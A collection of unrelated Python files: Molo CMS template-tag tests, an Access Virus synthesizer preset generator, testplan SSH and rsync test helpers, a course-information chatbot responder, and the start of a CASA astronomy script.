        self.english = SiteLanguageRelation.objects.create(
            language_setting=self.language_setting,
            locale='en',
            is_active=True)
        self.french = SiteLanguageRelation.objects.create(
            language_setting=self.language_setting,
            locale='fr',
            is_active=True)
        self.yourmind = self.mk_section(
            self.section_index, title='Your mind')
        self.yourmind_sub = self.mk_section(
            self.yourmind, title='Your mind subsection')
        # create a request object
        self.factory = RequestFactory()
        self.request = self.factory.get('/')
        self.request.site = self.site

    def test_render_translations(self):
        """render_translations returns {} for non-main-language pages."""
        # this should return an empty dictionary for non main lang pages
        article = self.mk_articles(self.yourmind, 1)[0]
        fr_article = self.mk_article_translation(article, self.french)
        self.assertEqual(render_translations({}, fr_article), {})

    def test_bannerpages_without_position(self):
        """Without a position argument all published banners are returned."""
        banner = BannerPage(title='test banner')
        self.banner_index.add_child(instance=banner)
        banner.save_revision().publish()
        banner2 = BannerPage(title='test banner 2')
        self.banner_index.add_child(instance=banner2)
        banner2.save_revision().publish()
        banner3 = BannerPage(title='test banner 3')
        self.banner_index.add_child(instance=banner3)
        banner3.save_revision().publish()
        self.assertEqual(self.main.bannerpages().count(), 3)
        request = self.factory.get('/')
        request.site = self.site
        self.assertEqual(len(bannerpages({
            'locale_code': 'en', 'request': request})['bannerpages']), 3)

    def test_bannerpages_with_position(self):
        """A position argument selects a single banner by creation order."""
        banner = BannerPage(title='test banner')
        self.banner_index.add_child(instance=banner)
        banner.save_revision().publish()
        banner2 = BannerPage(title='test banner 2')
        self.banner_index.add_child(instance=banner2)
        banner2.save_revision().publish()
        banner3 = BannerPage(title='test banner 3')
        self.banner_index.add_child(instance=banner3)
        banner3.save_revision().publish()
        self.assertEqual(self.main.bannerpages().count(), 3)
        request = self.factory.get('/')
        request.site = self.site
        self.assertEqual(len(bannerpages({
            'locale_code': 'en',
            'request': request}, position=0)['bannerpages']), 1)
        self.assertEqual(bannerpages({
            'locale_code': 'en',
            'request': request}, position=0)['bannerpages'][0].title,
            'test banner')
        self.assertEqual(bannerpages({
            'locale_code': 'en',
            'request': request}, position=1)['bannerpages'][0].title,
            'test banner 2')

    def test_bannerpages_with_position_out_of_range(self):
        """An out-of-range position yields None rather than raising."""
        banner = BannerPage(title='test banner')
        self.banner_index.add_child(instance=banner)
        banner.save_revision().publish()
        banner2 = BannerPage(title='test banner 2')
        self.banner_index.add_child(instance=banner2)
        banner2.save_revision().publish()
        banner3 = BannerPage(title='test banner 3')
        self.banner_index.add_child(instance=banner3)
        banner3.save_revision().publish()
        self.assertEqual(self.main.bannerpages().count(), 3)
        request = self.factory.get('/')
        request.site = self.site
        self.assertEqual(bannerpages({
            'locale_code': 'en',
            'request': request}, position=4), None)

    def test_get_parent_template_tag(self):
        """get_parent resolves the translated parent when one exists,
        falling back to the main-language parent, and None at the root."""
        request = self.factory.get('/')
        request.site = self.site
        article = self.mk_articles(self.yourmind, 1)[0]
        fr_article = self.mk_article_translation(article, self.french)
        self.assertEqual(
            get_parent({'locale_code': 'fr', 'request': request}, article),
            self.yourmind)
        self.assertEqual(
            get_parent({'locale_code': 'fr', 'request': request}, fr_article),
            self.yourmind)
        self.assertEqual(get_parent(
            {'locale_code': 'fr', 'request': request}, self.yourmind_sub),
            self.yourmind)
        fr_yourmind = self.mk_section_translation(self.yourmind, self.french)
        self.assertEqual(
            get_parent({'locale_code': 'en', 'request': request}, article),
            self.yourmind)
        self.assertEqual(
            get_parent({'locale_code': 'en', 'request': request}, fr_article),
            self.yourmind)
        self.assertEqual(get_parent(
            {'locale_code': 'en', 'request': request}, self.yourmind_sub),
            self.yourmind)
        self.assertEqual(
            get_parent({'locale_code': 'fr', 'request': request}, article),
            fr_yourmind)
        self.assertEqual(
            get_parent({'locale_code': 'fr', 'request': request}, fr_article),
            fr_yourmind)
        self.assertEqual(get_parent(
            {'locale_code': 'fr', 'request': request}, self.yourmind_sub),
            fr_yourmind)
        self.assertEqual(get_parent(
            {'locale_code': 'fr', 'request': request}, self.yourmind),
            None)

    def test_article_ordering_descendant_articles(self):
        """Descendant articles follow SiteSettings' PK / PK_DESC ordering."""
        today = timezone.now()
        request = self.factory.get('/')
        request.site = self.site
        settings = SiteSettings.objects.create(
            site=self.site,
            article_ordering_within_section=ArticleOrderingChoices.PK
        )
        article1 = self.mk_article(
            self.yourmind, title='article 1',
            first_published_at=today - timezone.timedelta(hours=1),
            featured_in_section_start_date=today - timezone.timedelta(hours=1)
        )
        article2 = self.mk_article(
            self.yourmind, title='article 2',
            first_published_at=today,
            featured_in_section_start_date=today
        )
        self.assertEqual(load_descendant_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[0], article1)
        self.assertEqual(load_descendant_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[1], article2)
        settings.article_ordering_within_section =\
            ArticleOrderingChoices.PK_DESC
        settings.save()
        self.assertEqual(load_descendant_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[0], article2)
        self.assertEqual(load_descendant_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[1], article1)

    def test_article_ordering_child_articles(self):
        """Child articles follow SiteSettings' PK / PK_DESC ordering."""
        today = timezone.now()
        request = self.factory.get('/')
        request.site = self.site
        settings = SiteSettings.objects.create(
            site=self.site,
            article_ordering_within_section=ArticleOrderingChoices.PK
        )
        article1 = self.mk_article(self.yourmind, title='article 1')
        article1.first_published_at = today + timezone.timedelta(hours=1)
        article1.save()
        article2 = self.mk_article(self.yourmind, title='article 2')
        article2.first_published_at = today - timezone.timedelta(hours=1)
        article2.save()
        self.assertEqual(load_child_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[0], article1)
        self.assertEqual(load_child_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[1], article2)
        settings.article_ordering_within_section =\
            ArticleOrderingChoices.PK_DESC
        settings.save()
        self.assertEqual(load_child_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[0], article2)
        self.assertEqual(load_child_articles_for_section({
            'locale_code': 'en', 'request': request
        }, self.yourmind)[1], article1)

    def test_get_recommended_articles(self):
        """An article with no recommendations yields an empty list."""
        request = self.factory.get('/')
        request.site = self.site
        article1 = self.mk_article(self.yourmind, title='article 1')
        self.assertEqual(get_recommended_articles(
            {'locale_code': 'en', 'request': request}, article1),
            [])

    @patch('molo.core.templatetags.core_tags.get_pages')
    def test_hero_article_empty_queryset_if_no_site(self, get_pages_mock):
        """hero_article degrades to an empty article list when request.site is None."""
        request = self.factory.get('/')
        request.site = None
        context = {'request': request, 'locale_code': 'en'}
        get_pages_mock.return_value = []
        self.assertEqual(
            hero_article(context),
            {
                'articles': [],
                'request': request,
                'locale_code': 'en',
            }
        )

    def test_load_sections(self):
        """load_sections splits ordinary sections from service aggregators."""
        request = self.factory.get('/')
        request.site = self.site
        context = {'locale_code': 'en', 'request': request}
        your_body = self.mk_section(
            self.section_index, title='Your body')
        service = self.mk_section(
            self.section_index,
            title='Service dir', is_service_aggregator=True)
        self.assertTrue(service not in load_sections(context))
        self.assertTrue(service in load_sections(
            context, service_aggregator=True))
        self.assertTrue(your_body in load_sections(context))
        self.assertTrue(your_body not in load_sections(
            context, service_aggregator=True))
class TestFormTemplateTags(TestCase, MoloTestCaseMixin):
    """Tests for the latest_form_listing template tag."""

    def setUp(self):
        """Create a site, a form index page and four published forms."""
        self.mk_main()
        self.main = Main.objects.all().first()
        self.language_setting = Languages.objects.create(
            site_id=self.main.get_site().pk)
        self.english = SiteLanguageRelation.objects.create(
            language_setting=self.language_setting,
            locale='en', is_active=True)
        LanguageRelation.objects.create(
            page=self.main, language=self.english)
        self.yourmind = self.mk_section(
            self.section_index, title='Your mind')
        self.yourmind_sub = self.mk_section(
            self.yourmind, title='Your mind subsection')
        self.form_index, created = FormIndexPage.\
            objects.get_or_create(title='Forms', slug='form-pages')
        if created:
            self.main.add_child(instance=self.form_index)
        self.form_index.save_revision().publish()
        # create and publish "test form 1" .. "test form 4"
        for i in range(1, 5):
            kw = {
                'title': 'test form {}'.format(i)}
            form = 'form{}'.format(i)
            setattr(self, form, FormPage(**kw))
            self.form_index.add_child(instance=getattr(self, form))
            self.form_index.save_revision().publish()

    def test_latest_form_listing(self):
        """Most recently created forms come first, limited to `limit` entries."""
        limit = 2
        res = latest_form_listing(limit)
        self.assertEqual(len(res['forms']), limit)
        self.assertEqual(res['forms'][0].title, 'test form 4')
        self.assertEqual(res['forms'][1].title, 'test form 3')
|
"""
we can inspect the factory installed presets for the access virus
by reading its MIDI sysex dumps.
these messages are formatted: (0, 32, 51, 1, dd, 16, bb, ss, [256 ints], cs)
where dd is the device id, bb is bank, ss is program number, and cs is checksum
we can also use this same format to write parameters to the working preset
for more info see page 255 of the virus B manual: https://www.virus.info/downloads
"""
from mido import Message
import numpy as np
from numpy import ndarray
import pandas as pd
from pandas import DataFrame
import random
from typing import Callable, List, Optional, Dict
# Header bytes per the module docstring format (0, 32, 51, 1, dd, 16, bb, ss):
# device id dd=0, bank bb=0, program ss=127.
VIRUS_SYSEX_HEADER = [0, 32, 51, 1, 0, 16, 0, 127]
VIRUS_SYSEX_CHECKSUM = [0]  # this value seems to be ignored on write
def parse_virus_preset_dump(msg: Message) -> List[int]:
    """
    Strip the sysex header and checksum bytes from *msg* and return the
    256 preset parameter values.
    """
    header_len = len(VIRUS_SYSEX_HEADER)
    checksum_len = len(VIRUS_SYSEX_CHECKSUM)
    params = list(msg.data)[header_len:-checksum_len]
    assert len(params) == 256
    return params
def create_virus_patch_msg(params: list) -> Message:
    """
    Wrap a list of 256 parameter values in a Mido sysex message that
    updates the virus.
    """
    assert len(params) == 256, params
    payload = [*VIRUS_SYSEX_HEADER, *params, *VIRUS_SYSEX_CHECKSUM]
    return Message('sysex', data=payload)
class VirusPresetGenerator:
    """
    Generates new Virus presets by sampling each of the 256 parameters
    from a distribution fitted to the factory preset dumps.
    """

    # parameters pinned to a fixed value in every generated patch
    DefaultOverrideParams = {
        64: 0,  # hold pedal
        91: 127,  # patch volume
        93: 65,  # transpose
        105: 0,  # chorus mix
        108: 0,  # chorus delay
        112: 0,  # delay / reverb mode
        113: 0,  # effect send
        241: 33,  # title string, val 33 = "!"
        242: 33,  # title string, val 33 = "!"
        243: 33,  # title string, val 33 = "!"
        244: 33,  # title string, val 33 = "!"
        245: 33,  # title string, val 33 = "!"
        246: 33,  # title string, val 33 = "!"
        247: 33,  # title string, val 33 = "!"
        248: 33,  # title string, val 33 = "!"
        249: 33,  # title string, val 33 = "!"
        250: 33,  # title string, val 33 = "!"
    }

    def __init__(
        self,
        preset_path: Optional[str] = None,
        preset_data: Optional[DataFrame] = None,
        uniq_val_thresh: int = 10,
        override_params: Optional[Dict[int, int]] = None,
    ):
        """
        either a path to a csv file or a dataframe must be passed in
        :arg preset_path: path to a CSV of factory presets (one row per preset)
        :arg preset_data: pre-loaded preset DataFrame (columns are param indices)
        :arg uniq_val_thresh: min number of unique values observed for a given
            parameter to use a triangular distribution. if fewer unique
            values are observed, use categorical distribution
        :arg override_params: optional map indicating which parameters
            should be set to default values
        """
        if preset_data is None:
            assert preset_path is not None
            preset_data = self.load_presets_from_csv(preset_path)
        self.preset_data = preset_data
        self.distributions = self.create_distributions(preset_data, uniq_val_thresh)
        self.override_params = self.DefaultOverrideParams if override_params is None else override_params  # noqa
        self.override_distributions()

    def override_distributions(self) -> None:
        """
        modifies previously created distributions s.t. overridden
        parameters return the proper default value
        """
        for idx, val in self.override_params.items():
            # bind val as a default argument to avoid the late-binding
            # closure pitfall
            def f(v=val):
                return v
            self.distributions[idx] = f

    def load_presets_from_csv(self, preset_path: str) -> DataFrame:
        """Read the preset CSV, coercing column labels to int param indices."""
        df = pd.read_csv(preset_path)
        df.columns = map(int, df.columns)
        return df

    @staticmethod
    def _create_categorical_probs(
        preset_vals: ndarray,
        min_val: int,
        max_val: int,
    ) -> ndarray:
        """
        returns an array x s.t. x[i] is the probability of i occurring in preset_vals
        :arg preset_vals: observed values whose probability density we want to model
        :arg min_val: smallest possible value
        :arg max_val: largest possible value
        """
        counts = dict(zip(*np.unique(preset_vals, return_counts=True)))
        count_array = np.array([counts.get(i, 0) for i in range(min_val, max_val+1)])
        return count_array / count_array.sum()

    @staticmethod
    def _create_categorical_dist(
        preset_vals: ndarray,
        min_val: int = 0,
        max_val: int = 127,
    ) -> Callable[[], int]:
        """
        a large number of Virus parameter values are either categorical
        (eg LFO shape) or have an unusual distribution in the factory
        preset patches. for these parameters, we want to sample from the
        observed probabilities of each value in the factory presets
        :arg preset_vals: parameter values observed in factory presets. this is the
            distribution we'd like to model.
        :arg min_val: smallest possible value
        :arg max_val: largest possible value
        """
        values = np.arange(min_val, max_val+1)
        probs = VirusPresetGenerator._create_categorical_probs(
            preset_vals, min_val=min_val, max_val=max_val)

        def f():
            return np.random.choice(values, 1, p=probs)[0]
        return f

    @staticmethod
    def _create_triangular_dist(
        preset_vals: ndarray,
        min_val: int = 0,
        max_val: int = 127,
    ) -> Callable[[], int]:
        """
        instead of using a uniform distribution for [0, 127], we'll use a
        triangular distribution to account for the fact that some presets
        will have mode that isn't centered
        :arg preset_vals: parameter values observed in factory presets. this is the
            distribution we'd like to model.
        :arg min_val: smallest possible value
        :arg max_val: largest possible value
        """
        def f():
            return int(np.round(np.random.triangular(0, preset_vals.mean(), 127)))
        return f

    def create_distributions(
        self,
        preset_data: DataFrame,
        uniq_val_thresh: int = 10
    ) -> List[Callable[[], int]]:
        """
        creates a map that maps the index of a virus synth parameter to
        a method that can be used to sample a new value based on that
        parameter's distribution of values in the factory presets.
        if a particular parameter has fewer than `uniq_val_thresh` values
        in the 256 factory presets, we assume this to be a categorical
        param, eg LFO shape. for these parameters, we want to only
        sample values observed in the factory presets.
        """
        distributions = []
        for i in preset_data.columns:
            preset_vals = preset_data[i].to_numpy()
            if len(preset_data[i].unique()) < uniq_val_thresh:
                distributions.append(self._create_categorical_dist(preset_vals))
            else:
                distributions.append(self._create_triangular_dist(preset_vals))
        return distributions

    def generate_patch(self) -> List[int]:
        """Sample a complete patch: one draw per parameter distribution."""
        return [d() for d in self.distributions]

    def generate_patch_from_seed(self, seed_id: int, n_diff_params: int = 25):
        """
        creates a new patch based on a stored preset.
        :arg seed_id: id of saved preset (max 255)
        :arg n_diff_params: number of params to randomly vary
        """
        assert seed_id < self.preset_data.shape[0]
        data = list(self.preset_data.loc[seed_id])
        n_total_params = self.preset_data.shape[1]
        # never randomize parameters pinned by override_params
        valid_params = set(range(n_total_params)).difference(self.override_params.keys())
        # Bug fixes: `n_rand_params` and `self.overrides` were undefined
        # names (NameError/AttributeError). sorted() is required because
        # random.sample() no longer accepts sets (Python 3.11+).
        params_to_change = random.sample(sorted(valid_params), n_diff_params)
        for param_id in params_to_change:
            data[param_id] = self.distributions[param_id]()
        for param_id, val in self.override_params.items():
            data[param_id] = val
        return data
|
import subprocess
from testplan.common.utils.remote import copy_cmd
def mock_ssh(host, command):
    """Avoid network connection."""
    # Ignore the host entirely and run the command through a local shell.
    local_shell = ["/bin/sh", "-c"]
    return local_shell + [command]
def strip_host(source, target, **kwargs):
    """Avoid network connection."""
    # Drop any "host:" prefix so the copy happens locally.
    source = source.split(":")[1] if ":" in source else source
    target = target.split(":")[1] if ":" in target else target
    return copy_cmd(source, target)
def copytree(src, dst):
    """
    We can't use shutil.copytree() with python 3.4.4 due to
    https://bugs.python.org/issue21697 so use rsync instead.
    """
    # Recursive copy, following symlinks, skipping VCS and bytecode files.
    rsync_cmd = ["rsync", "-rL"]
    for pattern in (".git", "*.pyc", "*__pycache__*"):
        rsync_cmd.append("--exclude=" + pattern)
    rsync_cmd.append(src)
    rsync_cmd.append(dst)
    subprocess.check_call(rsync_cmd)
|
from xuepy.client.api.interaction import Interaction
|
"""This class is responsible for dealing with the content of a users message and generating responses."""
from model import Model
from datastore import Course, Section
from typing import List, Set
from queryspec import Intent, QueryParameters, MissingFieldException
'''Takes in a message from the user, and uses its model to create a response message'''
class InvalidCourseException(Exception):
    """Raised when a referenced course id does not exist in the datastore."""
    pass
class Responder():
    """Turns a raw user message into a final response string.

    The Model classifies a message into an Intent plus QueryParameters;
    the matching ``handler_*`` method then builds the reply text, usually
    by querying the datastore.
    """
    def __init__(self, args, datastore, iohandler):
        self.args = args
        self.datastore = datastore
        self.iohandler = iohandler
        self.model = Model(args, datastore, iohandler)
        # Dispatch table: one handler method per recognized intent.
        self.intent_to_handler = {
            Intent.UNKNOWN : self.handler_unknown,
            Intent.PREREQS_OF_COURSE : self.handler_prereqs_of_course,
            Intent.UNITS_OF_COURSE : self.handler_units_of_course,
            Intent.COURSE_OFFERED_IN_TERM : self.handler_course_offered_in_term,
            Intent.TERMS_COURSE_OFFERED : self.handler_terms_course_offered,
            Intent.NUMBER_OF_TERMS_COURSE_OFFERED : self.handler_number_of_terms_course_offered,
            Intent.DOES_COURSE_INVOLVE_CODING : self.handler_does_course_involve_coding,
            Intent.WHAT_COURSES_INVOLVE_CODING : self.handler_what_courses_involve_coding,
            Intent.TEACHERS_OF_COURSE_CURRENT : self.handler_teachers_of_course_current,
            Intent.PROFESSOR_COURSES_CURRENT : self.handler_professor_courses_current,
            Intent.TEACHERS_OF_COURSE_NEXT : self.handler_teachers_of_course_next,
            Intent.PROFESSOR_COURSES_NEXT : self.handler_professor_courses_next,
            Intent.IS_COURSE_ELECTIVE : self.handler_is_course_elective,
            Intent.ELECTIVES_OFFERED_CURRENT : self.handler_electives_offered_current,
            Intent.ELECTIVES_OFFERED_NEXT : self.handler_electives_offered_next,
            Intent.DESCRIPTION_OF_COURSE : self.handler_description_of_course,
            Intent.FIND_COURSE_ABOUT_TOPIC : self.handler_find_course_about_topic,
            Intent.TIMES_COURSE_OFFERED_CURRENT : self.handler_times_course_offered_current,
            Intent.TIMES_COURSE_OFFERED_NEXT : self.handler_times_course_offered_next,
            Intent.HOURS_OF_COURSE : self.handler_hours_of_course,
            Intent.TITLE_OF_COURSE : self.handler_title_of_course,
            Intent.COURSE_ID_OF_COURSE : self.handler_course_id_of_course,
            Intent.LEVEL_OF_COURSE : self.handler_level_of_course,
            Intent.ENROLLMENT_CAP_OF_COURSE_CURRENT : self.handler_enrollment_cap_of_course_current,
            Intent.ENROLLMENT_CAP_OF_COURSE_NEXT : self.handler_enrollment_cap_of_course_next,
        }
    def get_response(self, message: str) -> str:
        '''The primary function of the Responder. Takes in a raw message from the user
        and returns a final response message'''
        intent, params = self.model.get_intent_and_params(message)
        if self.args.verbose:
            print(f"intent={intent.name}, params={params}")
        try:
            return self.intent_to_handler[intent](params)
        except MissingFieldException as e:
            return self.missing_information_response(intent, params, str(e))
        except InvalidCourseException as e:
            return self.invalid_course_message(str(e))
        except KeyboardInterrupt:
            # Re-raise without wrapping so Ctrl-C keeps its original traceback.
            raise
        except Exception as e:
            # In dev mode surface the bug; otherwise degrade to a generic apology.
            if self.args.dev_mode:
                raise e
            else:
                return self.get_error_message()
    # Query handlers
    def handler_unknown(self, params: QueryParameters) -> str:
        '''This one is special, it should use any params available to craft the best response it can'''
        return "unknown intent" #placeholder
    #Use this as a model for implementing the rest
    def handler_prereqs_of_course(self, params: QueryParameters) -> str:
        # Require the presence of variable for a given intent, this corresponds to the [variable] in the query
        params.require_class_id()
        # Retrieve the course object via self.get_course() this handles the case of an invalid course automatically
        course = self.get_course(params.class_id)
        #Special case response since prereqs could be None
        if course.prereqs is None:
            return f"{course.full_name()} has no prerequisite courses."
        #prefer to use course.full_name() as opposed to course.title
        return f"The prerequisites for {course.full_name()} are: {course.prereqs}"
    def handler_units_of_course(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        return f"{course.full_name()} counts for {course.units} units."
    def handler_course_offered_in_term(self, params: QueryParameters) -> str:
        params.require_class_id()
        params.require_term()
        course = self.get_course(params.class_id)
        if params.term in course.terms:
            return f"Yes, STAT {params.class_id} is offered in the {params.term.title()}."
        else:
            return f"Sorry, STAT {params.class_id} is not offered in the {params.term.title()}."
    def handler_terms_course_offered(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        if len(course.terms) == 0:
            return f"Sorry, {course.full_name()} is not a regularly offered class."
        if len(course.terms) == 1:
            return f"{course.full_name()} is typically offered in the {', '.join([t.title() for t in course.terms])}."
        else:
            return f"{course.full_name()} is typically offered in the following quarters: {', '.join([t.title() for t in course.terms])}."
    def handler_number_of_terms_course_offered(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        numberOfTerms = len(course.terms)
        # Singular/plural agreement for "quarter(s)".
        if numberOfTerms == 1:
            return f"{course.full_name()} is usually offered in {numberOfTerms} quarter."
        else:
            return f"{course.full_name()} is usually offered in {numberOfTerms} quarters."
    def handler_does_course_involve_coding(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        if course.coding_involved:
            return f"Yes, {course.full_name()} involves coding."
        else:
            return f"No, {course.full_name()} does not involve coding."
    def handler_what_courses_involve_coding(self, params: QueryParameters) -> str:
        classes = self.datastore.get_classes_with_coding()
        classes = ["STAT " + str(c) for c in classes]
        # Guard: previously an empty result produced the reply " require coding."
        if len(classes) == 0:
            return "Sorry, no courses involve coding."
        if len(classes) > 1:
            classes[-1] = "and " + str(classes[-1])
        return f"{', '.join(classes)} require coding."
    def handler_teachers_of_course_current(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} this quarter."
        professors = set()
        # Correct formatting and no duplicates
        for section in sections:
            name = section.teacher.split(", ")[0].title()
            professors.add(name)
        professors = list(professors)
        if len(professors) > 1:
            professors[-1] = "and " + professors[-1]
        # Can have 0, 1, or multiple professors teaching a class
        if len(professors) == 1:
            return f"Professor {', '.join(professors)} is teaching {sections[0].full_name()} this quarter."
        elif len(professors) == 0:
            return f"Sorry, no one is teaching STAT {params.class_id} this quarter."
        else:
            return f"Professors {', '.join(professors)} are teaching {sections[0].full_name()} this quarter."
    def handler_professor_courses_current(self, params: QueryParameters) -> str:
        params.require_professor()
        sections = self.datastore.get_sections_from_professor(params.professor, True)
        if len(sections) == 0:
            return f"Sorry, {params.professor} is not teaching any courses this quarter."
        classes = set()
        # Correct formatting and no duplicates
        for section in sections:
            name = section.full_name()
            classes.add(name)
        classes = list(classes)
        if len(classes) > 2:
            classes[-1] = "and " + str(classes[-1])
        if len(classes) == 0:
            return f"Sorry, Professor {params.professor.title()} is not teaching any classes this quarter."
        elif len(classes) == 2:
            return f"Professor {params.professor.title()} is teaching {classes[0] + ' and ' + classes[1]} this quarter."
        else:
            return f"Professor {params.professor.title()} is teaching {', '.join(classes)} this quarter."
    def handler_teachers_of_course_next(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} next quarter."
        professors = set()
        # Correct formatting and no duplicates
        for section in sections:
            name = section.teacher.split(", ")[0].title()
            professors.add(name)
        professors = list(professors)
        if len(professors) > 1:
            professors[-1] = "and " + professors[-1]
        # Can have 0, 1, or multiple professors teaching a class
        if len(professors) == 1:
            return f"Professor {', '.join(professors)} is teaching {sections[0].full_name()} next quarter."
        elif len(professors) == 0:
            return f"Sorry, no one is teaching STAT {params.class_id} next quarter."
        else:
            return f"Professors {', '.join(professors)} are teaching {sections[0].full_name()} next quarter."
    def handler_professor_courses_next(self, params: QueryParameters) -> str:
        params.require_professor()
        sections = self.datastore.get_sections_from_professor(params.professor, False)
        if len(sections) == 0:
            return f"Sorry, {params.professor} is not teaching any courses next quarter."
        classes = set()
        # Correct formatting and no duplicates
        for section in sections:
            name = section.full_name()
            classes.add(name)
        classes = list(classes)
        if len(classes) > 2:
            classes[-1] = "and " + str(classes[-1])
        if len(classes) == 0:
            return f"Sorry, Professor {params.professor.title()} is not teaching any classes next quarter."
        elif len(classes) == 2:
            return f"Professor {params.professor.title()} is teaching {classes[0] + ' and ' + classes[1]} next quarter."
        else:
            return f"Professor {params.professor.title()} is teaching {', '.join(classes)} next quarter."
    def handler_is_course_elective(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        if course.elective:
            return f"Yes, {course.full_name()} is an elective."
        else:
            return f"No, {course.full_name()} is not an elective."
    def handler_electives_offered_current(self, params: QueryParameters) -> str:
        results = self.datastore.get_electives_by_quarter(True)
        classes = []
        for result in results:
            classes.append("STAT " + str(result))
        if len(classes) > 1:
            classes[-1] = "and " + str(classes[-1])
        if len(classes) == 0:
            return f"Sorry, there are no electives offered this quarter."
        else:
            return f"{', '.join(classes)} are all the electives this quarter."
    def handler_electives_offered_next(self, params: QueryParameters) -> str:
        results = self.datastore.get_electives_by_quarter(False)
        classes = []
        for result in results:
            classes.append("STAT " + str(result))
        if len(classes) > 1:
            classes[-1] = "and " + str(classes[-1])
        if len(classes) == 0:
            return f"Sorry, there are no electives offered next quarter."
        else:
            return f"{', '.join(classes)} are all the electives offered next quarter."
    def handler_description_of_course(self, params: QueryParameters) -> str: #TODO: Make sure response sounds natural
        params.require_class_id()
        course = self.get_course(params.class_id)
        return f"{course.full_name()} is about {course.about}."
    def handler_find_course_about_topic(self, params: QueryParameters) -> str: #TODO: Improve response message
        params.require_topic()
        courses = self.datastore.get_courses_about_topic(params.topic)
        classes = []
        for course in courses:
            classes.append(course.full_name())
        if len(classes) > 2:
            classes[-1] = "and " + str(classes[-1])
        if len(classes) == 0:
            return f"Sorry, there aren't any courses about {params.topic}"
        elif len(classes) == 1:
            return f"{', '.join(classes)} is about {params.topic}."
        elif len(classes) == 2:
            return f"{classes[0] + ' and ' + classes[1]} are about {params.topic}."
        else:
            return f"{', '.join(classes)} are about {params.topic}."
    def handler_times_course_offered_current(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} this quarter."
        times = []
        for section in sections:
            if len(section.times_offered) > 0:
                times.append(section.times_offered)
        if len(times) > 2:
            times[-1] = "and " + str(times[-1])
        if len(times) == 0:
            return f"Sorry, {sections[0].full_name()} isn't offered synchronously this quarter. "
        elif len(times) == 2:
            return f"{sections[0].full_name()} is offered at {times[0] + ' and ' + times[1]} each week this quarter."
        else:
            return f"{sections[0].full_name()} is offered at {', '.join(times)} each week this quarter."
    def handler_times_course_offered_next(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} next quarter."
        times = []
        for section in sections:
            if len(section.times_offered) > 0:
                times.append(section.times_offered)
        if len(times) > 2:
            times[-1] = "and " + str(times[-1])
        if len(times) == 0:
            return f"Sorry, {sections[0].full_name()} isn't offered synchronously next quarter. "
        elif len(times) == 2:
            return f"{sections[0].full_name()} is offered at {times[0] + ' and ' + times[1]} each week next quarter."
        else:
            return f"{sections[0].full_name()} is offered at {', '.join(times)} each week next quarter."
    def handler_hours_of_course(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        return f"{course.full_name()} meets for {course.units} hours a week."
    def handler_title_of_course(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        return f"The title of {course.full_name()} is {course.title}."
    def handler_course_id_of_course(self, params: QueryParameters) -> str:
        params.require_class_id()
        course = self.get_course(params.class_id)
        return f"The class number of {course.full_name()} is {course.id}."
    def handler_level_of_course(self, params: QueryParameters) -> str: #TODO: Verify works correctly
        params.require_class_id()
        course = self.get_course(params.class_id)
        # Level is derived from the leading digit of the course id, e.g. 416 -> 400.
        return f"The level of {course.full_name()} is {str(course.id)[0]}00"
    def handler_enrollment_cap_of_course_current(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
        # BUG FIX: without this guard, sections[0] below raised IndexError
        # for a course with no sections this quarter.
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} this quarter."
        # Total cap is the sum across all sections of the course.
        cap = 0
        for section in sections:
            cap += section.enrollment_cap
        return f"The enrollment cap for {sections[0].full_name()} this quarter is {cap}."
    def handler_enrollment_cap_of_course_next(self, params: QueryParameters) -> str:
        params.require_class_id()
        sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
        # BUG FIX: without this guard, sections[0] below raised IndexError
        # for a course with no sections next quarter.
        if len(sections) == 0:
            return f"Sorry, there are no sections of STAT {params.class_id} next quarter."
        cap = 0
        for section in sections:
            cap += section.enrollment_cap
        return f"The enrollment cap for {sections[0].full_name()} next quarter is {cap}."
    def missing_information_response(self, intent: Intent, params: QueryParameters, missing_value: str):
        '''special handler for when an intent was determined, but the required parameters were missing'''
        return "Sorry, Looks like I'm confused, or your query is missing information. Try Rephrasing."
    #Extraneous methods
    def get_course(self, class_id: int) -> Course:
        '''This is the preferred method to get a course object. It handles the case of
        an invalid course id'''
        course = self.datastore.get_course_from_id(class_id)
        if course is None:
            raise InvalidCourseException(str(class_id))
        return course
    def invalid_course_message(self, class_id):
        return f"I'm sorry, It appears that STAT {class_id} is not a valid class."
    def is_signaling_exit(self, message):
        '''returns true if message intends to end the program'''
        message = message.strip().lower()
        if message in ('quit', 'bye', 'exit', 'q'):
            return True
        return False
    def get_exit_phrase(self):
        return "Bye"
    def get_error_message(self):
        return "Sorry, something went wrong."
|
# CASA (Common Astronomy Software Applications) imaging and phase
# self-calibration script for calibrator J1922+1530.
# NOTE(review): relies on names injected by the CASA shell at runtime
